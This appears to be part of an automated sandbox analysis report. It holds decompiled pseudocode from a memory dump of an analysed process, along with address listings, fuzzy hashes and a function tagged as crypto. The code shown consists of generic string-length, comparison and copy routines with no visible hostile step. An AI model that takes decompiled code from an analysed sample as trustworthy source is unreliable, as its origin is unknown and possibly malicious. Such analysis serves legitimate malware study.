																											E003B10B0();
																											_t318 = _v68;
																											_t387 = _t387 + 8;
																											L134:
																											_t219 = _a4;
																											_t219[1] = _t249;
																											 *_t219 = _t377;
																											L135:
																											__eflags = _t377;
																											if(_t377 == 0) {
																												goto L61;
																											}
																											_t250 = _v64;
																											_t285 = 0;
																											while(1) {
																												_t220 =  *_t250;
																												_t285 = _t285 + 1;
																												 *_t377 = _t220;
																												__eflags = _t318;
																												if(_t318 == 0) {
																													goto L140;
																												}
																												__eflags = _t285 - _t318;
																												if(_t285 == _t318) {
																													 *(_t377 + 1) = 0;
																													goto L61;
																												}
																												L140:
																												__eflags = _t220;
																												if(_t220 == 0) {
																													goto L61;
																												}
																												_t377 = _t377 + 1;
																												_t250 = _t250 + 1;
																												__eflags = _t250;
																											}
																										}
																										_t222 =  *_t284;
																										 *_t377 = _t222;
																										__eflags = _t222;
																										if(_t222 == 0) {
																											goto L132;
																										}
																										_v68 = _t318;
																										_t359 = 0;
																										__eflags = 0;
																										while(1) {
																											_t359 = _t359 + 1;
																											_t223 =  *((char*)(_t284 + _t359 * 2 - 1));
																											 *(_t377 + _t359 * 2 - 1) = _t223;
																											__eflags = _t223;
																											if(_t223 == 0) {
																												break;
																											}
																											_t224 =  *((char*)(_t284 + _t359 * 2));
																											 *(_t377 + _t359 * 2) = _t224;
																											__eflags = _t224;
																											if(_t224 != 0) {
																												continue;
																											}
																											break;
																										}
																										_t318 = _v68;
																										goto L132;
																									}
																								}
																								_t377 = 0;
																								goto L135;
																							}
																							_t225 = _t209 + _t242;
																							_t252 = _t225 & 0x0000000f;
																							__eflags = _t252;
																							if(_t252 == 0) {
																								L114:
																								_t318 =  ~( ~_t252 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																								__eflags = _t318;
																								while(1) {
																									asm("movdqu xmm1, [eax+ebx]");
																									asm("pcmpeqb xmm1, xmm0");
																									asm("pmovmskb ecx, xmm1");
																									__eflags = 0;
																									if(0 != 0) {
																										break;
																									}
																									_t252 = _t252 + 0x10;
																									__eflags = _t252 - _t318;
																									if(_t252 < _t318) {
																										continue;
																									}
																									__eflags = _t318 - 0x7fffffff;
																									if(_t318 >= 0x7fffffff) {
																										L120:
																										_t318 = 0x7fffffff;
																										goto L121;
																									} else {
																										goto L118;
																									}
																									while(1) {
																										L118:
																										__eflags =  *((char*)(_t318 + _t225));
																										if( *((char*)(_t318 + _t225)) == 0) {
																											goto L121;
																										}
																										_t318 = _t318 + 1;
																										__eflags = _t318 - 0x7fffffff;
																										if(_t318 < 0x7fffffff) {
																											continue;
																										}
																										goto L120;
																									}
																									goto L121;
																								}
																								asm("bsf edx, ecx");
																								_t318 = _t318 + _t252;
																								goto L121;
																							}
																							_t318 = 0;
																							_t252 =  ~_t252 + 0x10;
																							__eflags = _t252;
																							while(1) {
																								__eflags =  *((char*)(_t318 + _t225));
																								if( *((char*)(_t318 + _t225)) == 0) {
																									goto L121;
																								}
																								_t318 = _t318 + 1;
																								__eflags = _t318 - _t252;
																								if(_t318 < _t252) {
																									continue;
																								}
																								goto L114;
																							}
																							goto L121;
																						} else {
																							goto L104;
																						}
																						while(1) {
																							L104:
																							__eflags =  *((char*)(_t317 + _t209));
																							if( *((char*)(_t317 + _t209)) == 0) {
																								goto L107;
																							}
																							_t317 = _t317 + 1;
																							__eflags = _t317 - 0x7fffffff;
																							if(_t317 < 0x7fffffff) {
																								continue;
																							}
																							goto L106;
																						}
																						goto L107;
																					}
																					asm("bsf edx, esi");
																					_t317 = _t317 + _t277;
																					goto L107;
																				}
																				_t317 = 0;
																				_t277 =  ~_t277 + 0x10;
																				__eflags = _t277;
																				while(1) {
																					__eflags =  *((char*)(_t317 + _t209));
																					if( *((char*)(_t317 + _t209)) == 0) {
																						goto L107;
																					}
																					_t317 = _t317 + 1;
																					__eflags = _t317 - _t277;
																					if(_t317 < _t277) {
																						continue;
																					}
																					goto L100;
																				}
																				goto L107;
																			} else {
																				goto L93;
																			}
																			while(1) {
																				L93:
																				__eflags =  *((char*)(_t356 + _t273));
																				if( *((char*)(_t356 + _t273)) == 0) {
																					goto L96;
																				}
																				_t356 = _t356 + 1;
																				__eflags = _t356 - 0x7fffffff;
																				if(_t356 < 0x7fffffff) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L96;
																		}
																		asm("bsf edi, esi");
																		_t356 = _t356 + _t305;
																		goto L96;
																	}
																	_t305 = _t368;
																	_t356 = 0;
																	__eflags = 0;
																	while(1) {
																		__eflags =  *((char*)(_t356 + _t273));
																		if( *((char*)(_t356 + _t273)) == 0) {
																			goto L96;
																		}
																		_t356 = _t356 + 1;
																		__eflags = _t356 - _t368;
																		if(_t356 < _t368) {
																			continue;
																		}
																		goto L89;
																	}
																	goto L96;
																}
																_t206 = _t206 + 1;
																__eflags = _t206 - _v56;
																if(_t206 < _v56) {
																	continue;
																}
																goto L83;
															}
															_v32 = _t273;
															_t309 = _v60;
															_t373 = _v28;
															_t275 = _t235 + 1;
															__eflags = _t275;
															if(_t275 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t208 =  <=  ? _v40 : _v44;
															_t200 =  <=  ? _v40 : _v44;
															__eflags =  *(_t235 + 1);
															if( *(_t235 + 1) == 0) {
																goto L52;
															}
															_v60 = _t309;
															_v28 = _t373;
															while(1) {
																_t235 = _t235 + 1;
																_t275 = _t275 + 1;
																_t310 =  *_t235 & 0x000000ff;
																__eflags =  *((char*)(_t275 - 1)) + 0xffffffbf - 0x19;
																_t311 =  <=  ? _t310 + 0x20 : _t310;
																__eflags = ( <=  ? _t310 + 0x20 : _t310) - _t200;
																if(( <=  ? _t310 + 0x20 : _t310) == _t200) {
																	goto L165;
																}
																__eflags =  *_t275;
																if( *_t275 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L165;
														}
														_t200 = _v32;
														while(1) {
															__eflags =  *((char*)(_t272 + _t200));
															if( *((char*)(_t272 + _t200)) == 0) {
																break;
															}
															_t272 = _t272 + 1;
															__eflags = _t272 - 0x7fffffff;
															if(_t272 < 0x7fffffff) {
																continue;
															}
															_v32 = _t200;
															goto L77;
														}
														L160:
														_v32 = _t200;
														L161:
														__eflags = _t272;
														if(__eflags == 0) {
															goto L77;
														}
														if(__eflags > 0) {
															goto L78;
														}
														_t209 = _v36;
														_t273 = _v32;
														goto L84;
													}
													asm("bsf ecx, eax");
													_v32 = _t369;
													_t272 = _t272 + _t347;
													_t370 = _v28;
													goto L161;
												}
												_t200 = _v32;
												_t347 = _t368;
												_t272 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t272 + _t200));
													if( *((char*)(_t272 + _t200)) == 0) {
														goto L160;
													}
													_t272 = _t272 + 1;
													__eflags = _t272 - _t368;
													if(_t272 < _t368) {
														continue;
													}
													_v32 = _t200;
													goto L69;
												}
												goto L160;
												L165:
												_t305 = _v60;
												_t368 = _v28;
												__eflags = _t235;
											} while (_t235 != 0);
											goto L52;
										}
										goto L39;
									}
									_t227 =  *_t293;
									 *_t258 = _t227;
									__eflags = _t227;
									if(_t227 == 0) {
										goto L33;
									}
									_v60 = _t342;
									_t228 = 0;
									__eflags = 0;
									_v64 = _t361;
									_v68 = _t231;
									while(1) {
										_t228 = _t228 + 1;
										_t254 =  *((char*)(_t293 + _t228 * 2 - 1));
										 *(_t258 + _t228 * 2 - 1) = _t254;
										__eflags = _t254;
										if(_t254 == 0) {
											break;
										}
										_t255 =  *((char*)(_t293 + _t228 * 2));
										 *(_t258 + _t228 * 2) = _t255;
										__eflags = _t255;
										if(_t255 != 0) {
											continue;
										}
										break;
									}
									_t342 = _v60;
									_t361 = _v64;
									_t231 = _v68;
									goto L33;
								}
							}
							_t258 = _v52;
							goto L36;
						}
						_t329 = _t335 & 0x0000000f;
						__eflags = _t329;
						if(_t329 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t383 =  ~( ~_t329 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t383;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t184;
								if(_t184 != 0) {
									break;
								}
								_t329 = _t329 + 0x10;
								__eflags = _t329 - _t383;
								if(_t329 < _t383) {
									continue;
								}
								__eflags = _t383 - 0x7fffffff;
								if(_t383 >= 0x7fffffff) {
									L21:
									_t257 = 0x40;
									_t361 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t383 + _t335));
									if( *((char*)(_t383 + _t335)) == 0) {
										break;
									}
									_t383 = _t383 + 1;
									__eflags = _t383 - 0x7fffffff;
									if(_t383 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L167:
								__eflags = _t361 - 0xfffffffe;
								if(_t361 != 0xfffffffe) {
									_t257 = 0x40;
								} else {
									 *_t335 = 0;
									_t257 = _v48;
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t361 = _t383 + _t329;
							goto L167;
						}
						_t361 = 0;
						_t329 =  ~_t329 + 0x10;
						__eflags = _t329;
						while(1) {
							__eflags =  *((char*)(_t361 + _t335));
							if( *((char*)(_t361 + _t335)) == 0) {
								goto L167;
							}
							_t361 = _t361 + 1;
							__eflags = _t361 - _t329;
							if(_t361 < _t329) {
								continue;
							}
							goto L15;
						}
						goto L167;
					}
					_t190 =  &_v52;
					goto L37;
				}
				if(_t335 == 0) {
					L6:
					_push(1);
					_push(_t183);
					E003B10B0();
					_t387 = _t387 + 8;
					goto L8;
				}
				_t331 =  *_t183;
				 *_t335 = _t331;
				if(_t331 == 0) {
					goto L6;
				}
				_t289 = 0;
				while(1) {
					_t289 = _t289 + 1;
					_t332 =  *((char*)(_t183 + _t289 * 2 - 1));
					 *((char*)(_t335 + _t289 * 2 - 1)) = _t332;
					if(_t332 == 0) {
						goto L6;
					}
					_t333 =  *((char*)(_t183 + _t289 * 2));
					 *((char*)(_t335 + _t289 * 2)) = _t333;
					if(_t333 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x003c26be
0x003c26c2
0x003c26c4
0x003c26c8
0x003c26cf
0x003c26d1
0x003c26d4
0x003c26da
0x003c2711
0x003c2714
0x003c2714
0x003c2718
0x003c2720
0x003c2726
0x003c2731
0x003c2733
0x003c2e47
0x003c2e4c
0x003c27ad
0x003c27b2
0x003c27b2
0x003c27b5
0x003c27b8
0x003c27bb
0x003c27bd
0x003c27d2
0x003c27d5
0x003c27d5
0x003c27db
0x003c27e3
0x003c27e3
0x003c27e3
0x003c27e6
0x003c27ed
0x003c27f0
0x003c27f6
0x003c27f8
0x003c27fb
0x003c27ff
0x003c2801
0x003c2856
0x00000000
0x003c2803
0x003c2803
0x003c2805
0x003c2841
0x003c2841
0x003c2843
0x003c2844
0x003c2848
0x003c284d
0x003c2851
0x003c2859
0x003c2859
0x003c285d
0x003c2861
0x003c2865
0x003c2868
0x003c286e
0x003c2873
0x003c2873
0x003c2877
0x003c2880
0x003c2880
0x003c2885
0x003c2887
0x003c2889
0x003c2891
0x003c2893
0x003c2899
0x003c289d
0x003c28d7
0x003c2983
0x003c2983
0x003c2986
0x003c2988
0x003c298f
0x003c298f
0x003c2991
0x003c2995
0x003c299f
0x003c29a3
0x003c29b3
0x003c29b3
0x003c28a1
0x003c28c7
0x003c28c7
0x003c28c9
0x003c28ca
0x003c28cf
0x00000000
0x003c28cf
0x003c28a3
0x003c28a6
0x003c28aa
0x00000000
0x00000000
0x003c28ac
0x003c28ae
0x003c28ae
0x003c28af
0x003c28b4
0x003c28ba
0x00000000
0x00000000
0x003c28bc
0x003c28c0
0x003c28c5
0x00000000
0x00000000
0x00000000
0x003c28c5
0x00000000
0x003c28ae
0x003c2879
0x003c287e
0x003c28df
0x003c28e1
0x003c28e3
0x003c292c
0x003c292c
0x003c2931
0x003c2933
0x003c2935
0x003c293d
0x003c293f
0x003c2945
0x003c2947
0x003c2949
0x003c2980
0x00000000
0x003c2980
0x003c294b
0x003c294d
0x003c2973
0x003c2973
0x003c2975
0x003c2976
0x003c297b
0x00000000
0x003c297b
0x003c294f
0x003c2952
0x003c2954
0x003c2956
0x00000000
0x00000000
0x003c2958
0x003c2958
0x003c295a
0x003c295a
0x003c295b
0x003c2960
0x003c2964
0x003c2966
0x00000000
0x00000000
0x003c2968
0x003c296c
0x003c296f
0x003c2971
0x00000000
0x00000000
0x00000000
0x003c2971
0x00000000
0x003c295a
0x003c28e5
0x003c28e8
0x00000000
0x00000000
0x003c28ea
0x003c28ee
0x003c28ee
0x003c28f1
0x003c28f4
0x003c28f7
0x003c28fb
0x003c28fe
0x003c2901
0x003c2901
0x003c2903
0x003c2906
0x003c290a
0x003c290c
0x003c290c
0x003c290f
0x003c2912
0x003c2915
0x003c2918
0x003c291b
0x003c291e
0x00000000
0x00000000
0x003c2924
0x003c2925
0x003c2926
0x003c292a
0x00000000
0x00000000
0x00000000
0x003c292a
0x003c29b6
0x003c29ba
0x003c29be
0x003c29c0
0x00000000
0x00000000
0x003c29cb
0x003c29ce
0x003c29d6
0x003c29da
0x003c29de
0x003c29de
0x003c29e1
0x003c29e5
0x003c29e9
0x003c29e9
0x003c29eb
0x003c29ed
0x003c2a0a
0x003c2a16
0x003c2a1a
0x003c2a1a
0x003c2a20
0x003c2a24
0x003c2a24
0x003c2a29
0x003c2a2d
0x003c2a31
0x003c2a33
0x00000000
0x00000000
0x003c2a39
0x003c2a3c
0x003c2a3e
0x00000000
0x00000000
0x003c2a40
0x003c2a44
0x003c2a48
0x003c2a4e
0x003c2a6b
0x003c2a6b
0x003c2a70
0x003c2a70
0x003c2a74
0x003c2a74
0x003c2a76
0x003c2a7a
0x003c2a7e
0x003c2a82
0x003c2a82
0x003c2a86
0x003c2a89
0x003c2a90
0x003c2a99
0x003c2a9c
0x003c2a9f
0x003c2aa5
0x003c2aa8
0x003c2aab
0x003c2aad
0x003c2ab0
0x00000000
0x00000000
0x003c2abc
0x003c2abe
0x003c2ac7
0x003c2ac7
0x003c2acb
0x003c2acf
0x003c2ad3
0x003c2ad3
0x003c2ad5
0x00000000
0x00000000
0x003c2adb
0x003c2add
0x003c2aee
0x003c2afa
0x003c2afa
0x003c2b00
0x003c2b00
0x003c2b05
0x003c2b09
0x003c2b0d
0x003c2b0f
0x00000000
0x00000000
0x003c2b15
0x003c2b18
0x003c2b1a
0x00000000
0x00000000
0x003c2b1c
0x003c2b22
0x003c2b33
0x003c2b33
0x003c2b38
0x003c2b3a
0x003c2b3a
0x003c2b3d
0x003c2b51
0x003c2b5d
0x003c2b5d
0x003c2b63
0x003c2b63
0x003c2b68
0x003c2b6c
0x003c2b70
0x003c2b72
0x00000000
0x00000000
0x003c2b78
0x003c2b7b
0x003c2b7d
0x00000000
0x00000000
0x003c2b7f
0x003c2b85
0x003c2b96
0x003c2b96
0x003c2b9b
0x003c2b9f
0x003c2ba3
0x003c2ba5
0x003c2ba8
0x003c2bab
0x003c2bad
0x003c2baf
0x003c2bb2
0x003c2bb4
0x003c2bb7
0x003c2bb7
0x003c2bb9
0x003c2bbd
0x003c2d0b
0x003c2d0b
0x003c2d12
0x003c2d14
0x003c2d1a
0x003c2d1c
0x003c2d1e
0x003c2d58
0x00000000
0x003c2d58
0x003c2d20
0x003c2d22
0x003c2d48
0x003c2d48
0x003c2d4a
0x003c2d4b
0x003c2d50
0x00000000
0x003c2d50
0x003c2d24
0x003c2d27
0x003c2d29
0x003c2d2b
0x00000000
0x00000000
0x003c2d2d
0x003c2d2d
0x003c2d2f
0x003c2d2f
0x003c2d30
0x003c2d35
0x003c2d39
0x003c2d3b
0x00000000
0x00000000
0x003c2d3d
0x003c2d41
0x003c2d44
0x003c2d46
0x00000000
0x00000000
0x00000000
0x003c2d46
0x00000000
0x003c2d2f
0x003c2bc3
0x003c2bc7
0x00000000
0x00000000
0x003c2bcd
0x003c2bcf
0x003c2c36
0x003c2c3b
0x003c2c3b
0x003c2c3e
0x003c2c41
0x003c2c44
0x003c2c46
0x003c2c59
0x003c2c5c
0x003c2c5c
0x003c2c62
0x003c2c6a
0x003c2c6a
0x003c2c6a
0x003c2c6d
0x003c2c74
0x003c2c77
0x003c2c78
0x003c2c7c
0x003c2c81
0x003c2c85
0x003c2c87
0x003c2c8d
0x003c2c8f
0x003c2c91
0x003c2cd6
0x00000000
0x003c2c93
0x003c2c93
0x003c2c95
0x003c2cc1
0x003c2cc1
0x003c2cc3
0x003c2cc4
0x003c2cc8
0x003c2ccd
0x003c2cd1
0x003c2cd9
0x003c2cd9
0x003c2cdc
0x003c2cdf
0x003c2ce1
0x003c2ce1
0x003c2ce3
0x00000000
0x00000000
0x003c2ce9
0x003c2ced
0x003c2cf3
0x003c2cf3
0x003c2cf6
0x003c2cf7
0x003c2cf9
0x003c2cfb
0x00000000
0x00000000
0x003c2cfd
0x003c2cff
0x003c2d60
0x00000000
0x003c2d60
0x003c2d01
0x003c2d01
0x003c2d03
0x00000000
0x00000000
0x003c2cf1
0x003c2cf2
0x003c2cf2
0x003c2cf2
0x003c2cf3
0x003c2c97
0x003c2c9a
0x003c2c9c
0x003c2c9e
0x00000000
0x00000000
0x003c2ca0
0x003c2ca3
0x003c2ca3
0x003c2ca5
0x003c2ca5
0x003c2ca6
0x003c2cab
0x003c2caf
0x003c2cb1
0x00000000
0x00000000
0x003c2cb3
0x003c2cb7
0x003c2cba
0x003c2cbc
0x00000000
0x00000000
0x00000000
0x003c2cbc
0x003c2cbe
0x00000000
0x003c2cbe
0x003c2c91
0x003c2c48
0x00000000
0x003c2c48
0x003c2bd1
0x003c2bd5
0x003c2bd5
0x003c2bd8
0x003c2bec
0x003c2bf8
0x003c2bf8
0x003c2bfe
0x003c2bfe
0x003c2c03
0x003c2c07
0x003c2c0b
0x003c2c0d
0x00000000
0x00000000
0x003c2c13
0x003c2c16
0x003c2c18
0x00000000
0x00000000
0x003c2c1a
0x003c2c20
0x003c2c31
0x003c2c31
0x00000000
0x00000000
0x00000000
0x00000000
0x003c2c22
0x003c2c22
0x003c2c22
0x003c2c26
0x00000000
0x00000000
0x003c2c28
0x003c2c29
0x003c2c2f
0x00000000
0x00000000
0x00000000
0x003c2c2f
0x00000000
0x003c2c22
0x003c2d69
0x003c2d6c
0x00000000
0x003c2d6c
0x003c2bdc
0x003c2bde
0x003c2bde
0x003c2be1
0x003c2be1
0x003c2be5
0x00000000
0x00000000
0x003c2be7
0x003c2be8
0x003c2bea
0x00000000
0x00000000
0x00000000
0x003c2bea
0x00000000
0x00000000
0x00000000
0x00000000
0x003c2b87
0x003c2b87
0x003c2b87
0x003c2b8b
0x00000000
0x00000000
0x003c2b8d
0x003c2b8e
0x003c2b94
0x00000000
0x00000000
0x00000000
0x003c2b94
0x00000000
0x003c2b87
0x003c2d73
0x003c2d76
0x00000000
0x003c2d76
0x003c2b41
0x003c2b43
0x003c2b43
0x003c2b46
0x003c2b46
0x003c2b4a
0x00000000
0x00000000
0x003c2b4c
0x003c2b4d
0x003c2b4f
0x00000000
0x00000000
0x00000000
0x003c2b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x003c2b24
0x003c2b24
0x003c2b24
0x003c2b28
0x00000000
0x00000000
0x003c2b2a
0x003c2b2b
0x003c2b31
0x00000000
0x00000000
0x00000000
0x003c2b31
0x00000000
0x003c2b24
0x003c2d7d
0x003c2d80
0x00000000
0x003c2d80
0x003c2adf
0x003c2ae1
0x003c2ae1
0x003c2ae3
0x003c2ae3
0x003c2ae7
0x00000000
0x00000000
0x003c2ae9
0x003c2aea
0x003c2aec
0x00000000
0x00000000
0x00000000
0x003c2aec
0x00000000
0x003c2ae3
0x003c2ac0
0x003c2ac1
0x003c2ac5
0x00000000
0x00000000
0x00000000
0x003c2ac5
0x003c2d87
0x003c2d8b
0x003c2d8f
0x003c2d95
0x003c2d95
0x003c2d96
0x00000000
0x00000000
0x003c2d9c
0x003c2da5
0x003c2daa
0x003c2dad
0x003c2db1
0x00000000
0x00000000
0x003c2db7
0x003c2dbb
0x003c2dbf
0x003c2dbf
0x003c2dc0
0x003c2dc1
0x003c2dcb
0x003c2dd1
0x003c2dd4
0x003c2dd6
0x00000000
0x00000000
0x003c2dd8
0x003c2ddb
0x00000000
0x00000000
0x00000000
0x003c2ddd
0x00000000
0x003c2dbf
0x003c2a50
0x003c2a54
0x003c2a54
0x003c2a58
0x00000000
0x00000000
0x003c2a5e
0x003c2a5f
0x003c2a65
0x00000000
0x00000000
0x003c2a67
0x00000000
0x003c2a67
0x003c2de2
0x003c2de2
0x003c2de6
0x003c2de6
0x003c2de8
0x00000000
0x00000000
0x003c2dee
0x00000000
0x00000000
0x003c2df4
0x003c2df8
0x00000000
0x003c2df8
0x003c2e01
0x003c2e04
0x003c2e08
0x003c2e0a
0x00000000
0x003c2e0a
0x003c29ef
0x003c29f3
0x003c29f5
0x003c29f5
0x003c29f7
0x003c29f7
0x003c29fb
0x00000000
0x00000000
0x003c2a01
0x003c2a02
0x003c2a04
0x00000000
0x00000000
0x003c2a06
0x00000000
0x003c2a06
0x00000000
0x003c2e10
0x003c2e10
0x003c2e14
0x003c2e18
0x003c2e18
0x00000000
0x003c2e20
0x00000000
0x003c287e
0x003c2807
0x003c280a
0x003c280c
0x003c280e
0x00000000
0x00000000
0x003c2810
0x003c2814
0x003c2814
0x003c2816
0x003c281a
0x003c281d
0x003c281d
0x003c281e
0x003c2823
0x003c2827
0x003c2829
0x00000000
0x00000000
0x003c282b
0x003c282f
0x003c2832
0x003c2834
0x00000000
0x00000000
0x00000000
0x003c2834
0x003c2836
0x003c283a
0x003c283e
0x00000000
0x003c283e
0x003c2801
0x003c27bf
0x00000000
0x003c27bf
0x003c273b
0x003c273b
0x003c273e
0x003c2756
0x003c275a
0x003c2766
0x003c2766
0x003c276c
0x003c276c
0x003c2771
0x003c2775
0x003c2779
0x003c277b
0x00000000
0x00000000
0x003c2781
0x003c2784
0x003c2786
0x00000000
0x00000000
0x003c2788
0x003c278e
0x003c27a3
0x003c27a3
0x003c27a8
0x00000000
0x00000000
0x00000000
0x00000000
0x003c2790
0x003c2790
0x003c2790
0x003c2794
0x00000000
0x00000000
0x003c279a
0x003c279b
0x003c27a1
0x00000000
0x00000000
0x00000000
0x003c27a1
0x003c2e25
0x003c2e25
0x003c2e28
0x003c2e36
0x003c2e2a
0x003c2e2a
0x003c2e2d
0x003c2e2d
0x00000000
0x003c2e28
0x003c2e40
0x003c2e43
0x00000000
0x003c2e43
0x003c2742
0x003c2744
0x003c2744
0x003c2747
0x003c2747
0x003c274b
0x00000000
0x00000000
0x003c2751
0x003c2752
0x003c2754
0x00000000
0x00000000
0x00000000
0x003c2754
0x00000000
0x003c2747
0x003c2728
0x00000000
0x003c2728
0x003c26de
0x003c2704
0x003c2704
0x003c2706
0x003c2707
0x003c270c
0x00000000
0x003c270c
0x003c26e0
0x003c26e3
0x003c26e7
0x00000000
0x00000000
0x003c26e9
0x003c26eb
0x003c26eb
0x003c26ec
0x003c26f1
0x003c26f7
0x00000000
0x00000000
0x003c26f9
0x003c26fd
0x003c2702
0x00000000
0x00000000
0x00000000
0x003c2702
0x00000000

Strings

@, xrefs: 003C2718

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction ID: 6693ca972a56f19d437f40fb4193b24955b1e152b97ebce4d78f15d4a6a8d1cd
Opcode Fuzzy Hash: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction Fuzzy Hash: 3E322971A083924BD7278E38C490B2B7BD66FD5310F1E866DE896DB296DB34CD41C782

Uniqueness

Uniqueness Score: -1.00%

Function 003C1730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003C1730(unsigned int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				char* _t181;
				signed int _t182;
				signed int* _t188;
				signed int _t192;
				signed int* _t193;
				signed int _t198;
				signed int _t202;
				signed int _t205;
				void* _t206;
				signed int _t211;
				signed int _t214;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t244;
				signed int _t245;
				signed int _t251;
				signed int _t252;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				char _t262;
				char _t263;
				signed int _t264;
				signed int _t265;
				void* _t268;
				signed int _t270;
				char _t272;
				unsigned int _t275;
				signed int _t276;
				signed int _t279;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				signed int _t303;
				signed int _t309;
				signed int _t312;
				signed int _t314;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				void* _t325;
				signed int _t326;
				signed int _t327;
				signed int _t330;
				signed int* _t331;
				void* _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t347;
				char _t349;
				char _t350;
				char _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t363;
				unsigned int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				void* _t391;

				_v56 = 0;
				_t353 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t363 = E003B1030();
				_t391 = (_t388 & 0xfffffff0) - 0x34 + 4;
				_t181 = _v56;
				if(_t181 == 0) {
					 *_t363 = 0;
					L8:
					_t182 = _a8;
					_v52 = 0x40;
					_v56 = _t363;
					if(_t182 != 0) {
						__eflags = _t363;
						if(_t363 == 0) {
							_t260 = 0x40;
							_t240 = 0;
							L22:
							_t20 = _t240 + 2; // 0x80000001
							_t289 = _t20;
							__eflags = _t289 - 0x40;
							_t290 =  <=  ? 0x40 : _t289;
							__eflags = _t260 - _t290;
							if(_t260 < _t290) {
								_t368 = (_t290 >> 5 >> 0x1a) + _t290 >> 6;
								_t291 = _t290 & 0x8000003f;
								__eflags = _t291;
								if(_t291 < 0) {
									_t291 = (_t291 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t291;
								}
								__eflags = _t291;
								_t370 = _t368 + (0 | _t291 > 0x00000000) << 6;
								_push(_t370);
								_t261 = E003B1030();
								_t391 = _t391 + 4;
								_t292 = _v56;
								__eflags = _t292;
								if(_t292 == 0) {
									 *_t261 = 0;
									goto L35;
								} else {
									__eflags = _t261;
									if(_t261 == 0) {
										L33:
										_push(1);
										_push(_t292);
										_v68 = _t261;
										E003B10B0();
										_t261 = _v68;
										_t391 = _t391 + 8;
										L35:
										_v52 = _t370;
										_v56 = _t261;
										L36:
										 *((char*)(_t261 + _t240)) = _a8;
										_t188 =  &_v56;
										 *((char*)(_t240 +  *_t188 + 1)) = 0;
										L37:
										_t294 =  *_t188;
										if(_t294 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t241 = E003B1030();
											_t391 = _t391 + 4;
											_t192 =  *_a4;
											if(_t192 == 0) {
												 *_t241 = 0;
												L60:
												_t193 = _a4;
												 *_t193 = _t241;
												_t193[1] = 0x40;
												L61:
												_push(1);
												_push(_v56);
												E003B10B0();
												_v56 = 0;
												_v52 = 0;
												return _a4;
											}
											if(_t241 == 0) {
												L45:
												_push(1);
												_push(_t192);
												E003B10B0();
												_t391 = _t391 + 8;
												goto L60;
											}
											_t296 =  *_t192;
											 *_t241 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t262 =  *((char*)(_t192 + _t297 * 2 - 1));
												 *((char*)(_t241 + _t297 * 2 - 1)) = _t262;
												if(_t262 == 0) {
													goto L45;
												}
												_t263 =  *((char*)(_t192 + _t297 * 2));
												 *((char*)(_t241 + _t297 * 2)) = _t263;
												if(_t263 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t198 =  *_t294;
										if(_t198 != 0) {
											_t355 =  *_t353;
											__eflags = _t355;
											if(_t355 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t241 = E003B1030();
												_t391 = _t391 + 4;
												_t202 =  *_a4;
												__eflags = _t202;
												if(_t202 == 0) {
													 *_t241 = 0;
													goto L60;
												}
												__eflags = _t241;
												if(_t241 == 0) {
													L58:
													_push(1);
													_push(_t202);
													E003B10B0();
													_t391 = _t391 + 8;
													goto L60;
												}
												_t299 =  *_t202;
												 *_t241 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t264 =  *((char*)(_t202 + _t300 * 2 - 1));
													 *(_t241 + _t300 * 2 - 1) = _t264;
													__eflags = _t264;
													if(_t264 == 0) {
														goto L58;
													}
													_t265 =  *((char*)(_t202 + _t300 * 2));
